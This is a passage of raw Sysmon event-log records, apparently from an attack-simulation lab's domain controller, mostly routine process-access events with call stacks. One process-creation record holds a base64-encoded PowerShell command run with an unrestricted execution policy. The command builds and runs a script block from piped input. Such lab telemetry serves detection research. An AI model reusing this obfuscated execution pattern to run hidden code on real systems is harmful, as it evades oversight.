32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000083Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.233{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000082Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.233{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000081Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.233{733EE690-3C5B-5F80-0500-000000007E01}640764C:\Windows\system32\csrss.exe{733EE690-3DD2-5F80-F202-000000007E01}2336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x800000000000000080Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.233{733EE690-3DD2-5F80-F102-000000007E01}47804752C:\Windows\system32\cmd.exe{733EE690-3DD2-5F80-F202-000000007E01}2336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x800000000000000079Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.224{733EE690-3DD2-5F80-F202-000000007E01}2336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD2-5F80-EE26-110000000000}0x1126ee0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3DD2-5F80-F102-000000007E01}4780C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x800000000000000078Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.218{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000077Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.218{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000076Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.218{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000075Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.218{733EE690-3DD2-5F80-F002-000000007E01}47364856C:\Windows\system32\conhost.exe{733EE690-3DD2-5F80-F102-000000007E01}4780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000074Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.218{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000073Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.218{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000072Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.218{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000071Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.218{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000070Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.218{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000069Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.218{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000068Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.218{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000067Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.218{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000066Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 